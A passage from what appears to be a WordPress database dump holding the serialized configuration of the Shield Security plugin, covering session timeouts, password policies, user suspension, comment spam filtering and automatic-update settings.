Notification Email\";s:7:\"summary\";s:53:\"Send An Notification Email When Administrator Logs In\";s:11:\"description\";s:168:\"If you would like to be notified every time an administrator user logs into this WordPress site, enter a notification email address. No email address - No Notification.\";}i:3;a:10:{s:3:\"key\";s:24:\"session_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:2;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Session Timeout\";s:7:\"summary\";s:65:\"Specify How Many Days After Login To Automatically Force Re-Login\";s:11:\"description\";s:75:\"WordPress default is 2 days, or 14 days if you check the \'Remember Me\' box.\";}i:4;a:10:{s:3:\"key\";s:29:\"session_idle_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:48;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:70:\"https://icontrolwp.freshdesk.com/support/solutions/articles/3000070590\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Idle Timeout\";s:7:\"summary\";s:68:\"Specify How Many Hours After Inactivity To Automatically Logout User\";s:11:\"description\";s:157:\"If the user is inactive for the number of hours specified, they will be forcefully logged out next time they return. Set this to \'0\' to turn off this option.\";}i:5;a:9:{s:3:\"key\";s:21:\"session_lock_location\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Lock To Location\";s:7:\"summary\";s:34:\"Locks A User Session To IP address\";s:11:\"description\";s:211:\"When selected, a session is restricted to the same IP address as when the user logged in. If a logged-in user\'s IP address changes, the session will be invalidated and they\'ll be forced to re-login to WordPress.\";}i:6;a:10:{s:3:\"key\";s:33:\"session_username_concurrent_limit\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Max Simultaneous Sessions\";s:7:\"summary\";s:49:\"Limit Simultaneous Sessions For The Same Username\";s:11:\"description\";s:137:\"The number provided here is the maximum number of simultaneous, distinct, sessions allowed for any given username. Use \'0\' for no limits.\";}i:7;a:11:{s:3:\"key\";s:18:\"reg_email_validate\";s:7:\"section\";s:16:\"section_user_reg\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:3:\"log\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:8:\"Log Only\";}i:2;a:2:{s:9:\"value_key\";s:7:\"offense\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:24:\"Immediate Block and Kill\";}}s:9:\"link_info\";s:19:\"https://shsec.io/gk\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:24:\"Validate Email Addresses\";s:7:\"summary\";s:55:\"Validate Email Addresses When User Attempts To Register\";s:11:\"description\";s:56:\"Validate Email Addresses When User Attempts To Register.\";}i:8;a:10:{s:3:\"key\";s:12:\"email_checks\";s:7:\"section\";s:16:\"section_user_reg\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:2:{i:0;s:6:\"syntax\";i:1;s:6:\"domain\";}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:6:\"syntax\";s:4:\"text\";s:20:\"Email Address Syntax\";}i:1;a:2:{s:9:\"value_key\";s:6:\"domain\";s:4:\"text\";s:20:\"Domain Name Resolves\";}i:2;a:2:{s:9:\"value_key\";s:2:\"mx\";s:4:\"text\";s:9:\"Domain MX\";}i:3;a:2:{s:9:\"value_key\";s:13:\"nondisposable\";s:4:\"text\";s:24:\"Disposable Email Service\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Email Checks\";s:7:\"summary\";s:48:\"The Email Address Properties That Will Be Tested\";s:11:\"description\";s:14:\"Select which .\";}i:9;a:9:{s:3:\"key\";s:24:\"enable_password_policies\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/e1\";s:9:\"link_blog\";s:19:\"https://shsec.io/c4\";s:4:\"name\";s:24:\"Enable Password Policies\";s:7:\"summary\";s:34:\"Enable The Password Policies Below\";s:11:\"description\";s:34:\"Turn on/off all password policies.\";}i:10;a:9:{s:3:\"key\";s:18:\"pass_prevent_pwned\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/by\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Prevent Pwned Passwords\";s:7:\"summary\";s:30:\"Prevent Use Of Pwned Passwords\";s:11:\"description\";s:94:\"Prevents users from using any passwords found on the public available list of pwned passwords.\";}i:11;a:10:{s:3:\"key\";s:15:\"pass_min_length\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"12\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Minimum Length\";s:7:\"summary\";s:23:\"Minimum Password Length\";s:11:\"description\";s:79:\"All passwords that a user sets must be at least this many characters in length.\";}i:12;a:11:{s:3:\"key\";s:17:\"pass_min_strength\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:1:\"4\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:9:\"Very Weak\";}i:1;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Weak\";}i:2;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:6:\"Medium\";}i:3;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:6:\"Strong\";}i:4;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:11:\"Very Strong\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Minimum Strength\";s:7:\"summary\";s:25:\"Minimum Password Strength\";s:11:\"description\";s:63:\"All passwords that a user sets must meet this minimum strength.\";}i:13;a:10:{s:3:\"key\";s:19:\"pass_force_existing\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Apply To Existing Users\";s:7:\"summary\";s:61:\"Apply Password Policies To Existing Users and Their Passwords\";s:11:\"description\";s:104:\"Forces existing users to update their passwords if they don\'t meet requirements, after they next login .\";}i:14;a:11:{s:3:\"key\";s:11:\"pass_expire\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Password Expiration\";s:7:\"summary\";s:37:\"Passwords Expire After This Many Days\";s:11:\"description\";s:81:\"Users will be forced to reset their passwords after the number of days specified.\";}i:15;a:10:{s:3:\"key\";s:14:\"manual_suspend\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/fq\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:4:\"name\";s:28:\"Allow Manual User Suspension\";s:7:\"summary\";s:47:\"Manually Suspend User Accounts To Prevent Login\";s:11:\"description\";s:58:\"Users may be suspended by administrators to prevent login.\";}i:16;a:10:{s:3:\"key\";s:13:\"auto_password\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/fs\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:4:\"name\";s:30:\"Auto-Suspend Expired Passwords\";s:7:\"summary\";s:50:\"Automatically Suspend Users With Expired Passwords\";s:11:\"description\";s:63:\"Suspend login by users and require password reset to unsuspend.\";}i:17;a:11:{s:3:\"key\";s:14:\"auto_idle_days\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:18;a:10:{s:3:\"key\";s:15:\"auto_idle_roles\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";}s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:19;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:20;a:5:{s:3:\"key\";s:22:\"hard_suspended_userids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:3:{s:29:\"pwned_api_url_password_single\";s:45:\"https://api.pwnedpasswords.com/pwnedpassword/\";s:28:\"pwned_api_url_password_range\";s:37:\"https://api.pwnedpasswords.com/range/\";s:6:\"events\";a:12:{s:16:\"session_notfound\";a:0:{}s:15:\"session_expired\";a:0:{}s:12:\"session_idle\";a:0:{}s:14:\"session_iplock\";a:0:{}s:19:\"session_browserlock\";a:0:{}s:18:\"session_unverified\";a:0:{}s:16:\"password_expired\";a:0:{}s:28:\"password_policy_force_change\";a:1:{s:6:\"recent\";b:1;}s:21:\"password_policy_block\";a:1:{s:6:\"recent\";b:1;}s:19:\"user_hard_suspended\";a:1:{s:6:\"recent\";b:1;}s:21:\"user_hard_unsuspended\";a:0:{}s:17:\"reg_email_invalid\";a:1:{s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334244,'shield_mod_config_e6e7cde48b156ab45df41364e17eac0e','a:7:{s:4:\"slug\";s:15:\"comments_filter\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"comments_filter\";s:4:\"name\";s:13:\"Comments SPAM\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:14:\"commentsfilter\";s:7:\"tagline\";s:42:\"Block comment SPAM and retain your privacy\";s:12:\"use_sessions\";b:1;s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:50;}s:13:\"admin_notices\";a:1:{s:15:\"akismet-running\";a:4:{s:2:\"id\";s:15:\"akismet-running\";s:12:\"plugin_admin\";s:3:\"yes\";s:16:\"plugin_page_only\";b:1;s:4:\"type\";s:7:\"warning\";}}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:42:\"section_bot_comment_spam_protection_filter\";s:5:\"title\";s:44:\"Automatic Bot Comment SPAM Protection Filter\";s:11:\"title_short\";s:8:\"Bot SPAM\";s:7:\"primary\";b:1;s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Blocks 100% of all automated bot-generated comment SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:17:\"section_recaptcha\";s:5:\"title\";s:16:\"Google reCAPTCHA\";s:11:\"title_short\";s:9:\"reCAPTCHA\";s:7:\"summary\";a:3:{i:0;s:53:\"Purpose - Adds Google reCAPTCHA to the Comment Forms.\";i:1;s:37:\"Recommendation - Keep this turned on.\";i:2;s:109:\"Note - You will need to register for Google reCAPTCHA keys and store them in the Shield \'Dashboard\' settings.\";}}i:2;a:4:{s:4:\"slug\";s:25:\"section_human_spam_filter\";s:5:\"title\";s:36:\"Human Comment SPAM Protection Filter\";s:11:\"title_short\";s:10:\"Human SPAM\";s:7:\"summary\";a:2:{i:0;s:78:\"Purpose - Uses a 3rd party SPAM dictionary to detect human-based comment SPAM.\";i:1;s:176:\"Recommendation - Use of this feature is highly recommend.This tool, unlike other SPAM tools such as Akismet, will not send your comment data to 3rd party services for analysis.\";}}i:3;a:4:{s:4:\"slug\";s:31:\"section_bot_comment_spam_common\";s:5:\"title\";s:37:\"Common Settings For All SPAM Scanning\";s:11:\"title_short\";s:15:\"Common Settings\";s:7:\"summary\";a:1:{i:0;s:59:\"Purpose - Settings that apply to all comment SPAM scanning.\";}}i:4;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:5;a:4:{s:4:\"slug\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:5:\"title\";s:39:\"Enable Module: Comments SPAM Protection\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:126:\"Purpose - The Comments Filter can block 100% of automated spam bots and also offer the option to analyse human-generated spam.\";i:1;s:60:\"Recommendation - Keep the Comments Filter feature turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:16:{i:0;a:9:{s:3:\"key\";s:22:\"enable_comments_filter\";s:7:\"section\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3z\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf04\";s:4:\"name\";s:22:\"Enable SPAM Protection\";s:7:\"summary\";s:55:\"Enable (or Disable) The Comments SPAM Protection module\";s:11:\"description\";s:83:\"Un-Checking this option will completely disable the Comments SPAM Protection module\";}i:1;a:10:{s:3:\"key\";s:25:\"trusted_commenter_minimum\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"default\";i:1;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Trusted Commenter Minimum\";s:7:\"summary\";s:63:\"Minimum Number Of Approved Comments Before Commenter Is Trusted\";s:11:\"description\";s:117:\"Specify how many approved comments must exist before a commenter is trusted and their comments are no longer scanned.\";}i:2;a:10:{s:3:\"key\";s:18:\"trusted_user_roles\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"premium\";b:1;s:7:\"default\";a:5:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";i:4;s:10:\"subscriber\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Trusted Users\";s:7:\"summary\";s:54:\"Don\'t Scan Comments For Users With The Following Roles\";s:11:\"description\";s:124:\"Shield doesn\'t normally scan comments from logged-in or registered users. Specify user roles here that shouldn\'t be scanned.\";}i:3;a:9:{s:3:\"key\";s:31:\"enable_comments_gasp_protection\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3n\";s:9:\"link_blog\";s:19:\"https://shsec.io/2n\";s:4:\"name\";s:15:\"GASP Protection\";s:7:\"summary\";s:22:\"Block Bot Comment SPAM\";s:11:\"description\";s:121:\"Taking the lead from the original GASP plugin for WordPress, we have extended it to include advanced spam-bot protection.\";}i:4;a:10:{s:3:\"key\";s:26:\"comments_cooldown_interval\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";i:10;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/3o\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Comments Cooldown\";s:7:\"summary\";s:61:\"Limit posting comments to X seconds after the page has loaded\";s:11:\"description\";s:109:\"By forcing a comments cooldown period, you restrict a Spambot\'s ability to post multiple times to your posts.\";}i:5;a:10:{s:3:\"key\";s:32:\"comments_default_action_spam_bot\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:4:\"spam\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";i:0;s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:9:\"link_info\";s:19:\"https://shsec.io/6j\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Default SPAM Action\";s:7:\"summary\";s:53:\"How To Categorise Comments When Identified To Be SPAM\";s:11:\"description\";s:118:\"When a comment is detected as being SPAM from an automatic bot, the comment will be categorised based on this setting.\";}i:6;a:9:{s:3:\"key\";s:33:\"enable_comments_human_spam_filter\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/57\";s:9:\"link_blog\";s:19:\"https://shsec.io/9w\";s:4:\"name\";s:17:\"Human SPAM Filter\";s:7:\"summary\";s:48:\"Enable (or Disable) The Human SPAM Filter module\";s:11:\"description\";s:145:\"Scans the content of WordPress comments for keywords that are indicative of SPAM and marks the comment according to your preferred setting below.\";}i:7;a:10:{s:3:\"key\";s:39:\"enable_comments_human_spam_filter_items\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:6:{i:0;s:11:\"author_name\";i:1;s:12:\"author_email\";i:2;s:15:\"comment_content\";i:3;s:3:\"url\";i:4;s:10:\"ip_address\";i:5;s:10:\"user_agent\";}s:13:\"value_options\";a:6:{i:0;a:2:{s:9:\"value_key\";s:11:\"author_name\";s:4:\"text\";s:11:\"Author Name\";}i:1;a:2:{s:9:\"value_key\";s:12:\"author_email\";s:4:\"text\";s:12:\"Author Email\";}i:2;a:2:{s:9:\"value_key\";s:15:\"comment_content\";s:4:\"text\";s:15:\"Comment Content\";}i:3;a:2:{s:9:\"value_key\";s:3:\"url\";s:4:\"text\";s:3:\"URL\";}i:4;a:2:{s:9:\"value_key\";s:10:\"ip_address\";s:4:\"text\";s:10:\"IP Address\";}i:5;a:2:{s:9:\"value_key\";s:10:\"user_agent\";s:4:\"text\";s:18:\"Browser User Agent\";}}s:9:\"link_info\";s:19:\"https://shsec.io/58\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Comment Filter Items\";s:7:\"summary\";s:33:\"Select The Items To Scan For SPAM\";s:11:\"description\";s:108:\"When a user submits a comment, only the selected parts of the comment data will be scanned for SPAM content.\";}i:8;a:8:{s:3:\"key\";s:34:\"comments_default_action_human_spam\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";i:0;s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";i:0;s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:4:\"name\";s:19:\"Default SPAM Action\";s:7:\"summary\";s:54:\"How To Categorise Comments When Identified To Be SPAM\'\";s:11:\"description\";s:119:\"When a comment is detected as being SPAM from a human commenter, the comment will be categorised based on this setting.\";}i:9;a:9:{s:3:\"key\";s:32:\"enable_google_recaptcha_comments\";s:7:\"section\";s:17:\"section_recaptcha\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Google reCAPTCHA\";s:7:\"summary\";s:36:\"Enable Google reCAPTCHA For Comments\";s:11:\"description\";s:71:\"Use Google reCAPTCHA on the comments form to prevent bot-spam comments.\";}i:10;a:11:{s:3:\"key\";s:31:\"google_recaptcha_style_comments\";s:7:\"section\";s:17:\"section_recaptcha\";s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:1;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:2;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:3;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/e4\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"reCAPTCHA Style\";s:7:\"summary\";s:38:\"How Google reCAPTCHA Will Be Displayed\";s:11:\"description\";s:109:\"You can choose the reCAPTCHA display format that best suits your site, including the new Invisible Recaptcha.\";}i:11;a:10:{s:3:\"key\";s:30:\"comments_token_expire_interval\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";i:600;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/3o\";s:9:\"link_blog\";s:19:\"https://shsec.io/9v\";s:4:\"name\";s:20:\"Comment Token Expire\";s:7:\"summary\";s:54:\"A visitor has X seconds within which to post a comment\";s:11:\"description\";s:209:\"Default: 600 seconds (10 minutes). Each visitor is given a unique \'Token\' so they can comment. This restricts spambots, but we need to force these tokens to expire and at the same time not bother the visitors.\";}i:12;a:10:{s:3:\"key\";s:23:\"custom_message_checkbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Custom Checkbox Message\";s:7:\"summary\";s:63:\"If you want a custom checkbox message, please provide this here\";s:11:\"description\";s:50:\"You can customise the message beside the checkbox.\";}i:13;a:10:{s:3:\"key\";s:20:\"custom_message_alert\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Custom Alert Message\";s:7:\"summary\";s:60:\"If you want a custom alert message, please provide this here\";s:11:\"description\";s:101:\"This alert message is displayed when a visitor attempts to submit a comment without checking the box.\";}i:14;a:10:{s:3:\"key\";s:27:\"custom_message_comment_wait\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Custom Wait Message\";s:7:\"summary\";s:74:\"If you want a custom submit-button wait message, please provide this here.\";s:11:\"description\";s:111:\"Where you see the \'%s\' this will be the number of seconds. You must ensure you include 1, and only 1, of these.\";}i:15;a:10:{s:3:\"key\";s:29:\"custom_message_comment_reload\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Custom Reload Message\";s:7:\"summary\";s:90:\"If you want a custom message when the comment token has expired, please provide this here.\";s:11:\"description\";s:81:\"This message is displayed on the submit-button when the comment token is expired.\";}}s:11:\"definitions\";a:4:{s:24:\"url_spam_blacklist_terms\";s:89:\"https://raw.githubusercontent.com/splorp/wordpress-comment-blacklist/master/blacklist.txt\";s:34:\"spambot_comments_filter_table_name\";s:23:\"spambot_comments_filter\";s:37:\"spambot_comments_filter_table_columns\";a:6:{i:0;s:2:\"id\";i:1;s:7:\"post_id\";i:2;s:12:\"unique_token\";i:3;s:2:\"ip\";i:4;s:10:\"created_at\";i:5;s:10:\"deleted_at\";}s:6:\"events\";a:3:{s:14:\"spam_block_bot\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:20:\"spam_block_recaptcha\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:16:\"spam_block_human\";a:2:{s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334245,'shield_mod_config_6f1bc074772c461a6a0eeb557829a16a','a:6:{s:4:\"slug\";s:11:\"autoupdates\";s:10:\"properties\";a:13:{s:4:\"slug\";s:11:\"autoupdates\";s:4:\"name\";s:17:\"Automatic Updates\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"autoupdates\";s:7:\"tagline\";s:53:\"Take back full control of WordPress automatic updates\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:60;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"primary\";b:1;s:5:\"title\";s:42:\"Automatic Updates For WordPress Components\";s:11:\"title_short\";s:20:\"WordPress Components\";s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Control how automatic updates for each WordPress component is handled.\";i:1;s:80:\"Recommendation - You should at least allow minor updates for the WordPress core.\";}}i:1;a:4:{s:4:\"slug\";s:15:\"section_options\";s:5:\"title\";s:19:\"Auto-Update Options\";s:11:\"title_short\";s:19:\"Auto-Update Options\";s:7:\"summary\";s:77:\"Purpose - Make adjustments to how automatic updates are handled on your site.\";}i:2;a:4:{s:4:\"slug\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:5:\"title\";s:32:\"Enable Module: Automatic Updates\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:137:\"Purpose - Automatic Updates lets you manage the WordPress automatic updates engine so you choose what exactly gets updated automatically.\";i:1;s:62:\"Recommendation - Keep the Automatic Updates feature turned on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:14:{i:0;a:9:{s:3:\"key\";s:18:\"enable_autoupdates\";s:7:\"section\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3w\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:24:\"Enable Automatic Updates\";s:7:\"summary\";s:48:\"Enable (or Disable) The Automatic Updates module\";s:11:\"description\";s:76:\"Un-Checking this option will completely disable the Automatic Updates module\";}i:1;a:9:{s:3:\"key\";s:29:\"enable_autoupdate_disable_all\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3v\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Disable All\";s:7:\"summary\";s:46:\"Completely Disable WordPress Automatic Updates\";s:11:\"description\";s:122:\"When selected, regardless of any other settings, all WordPress automatic updates on this site will be completely 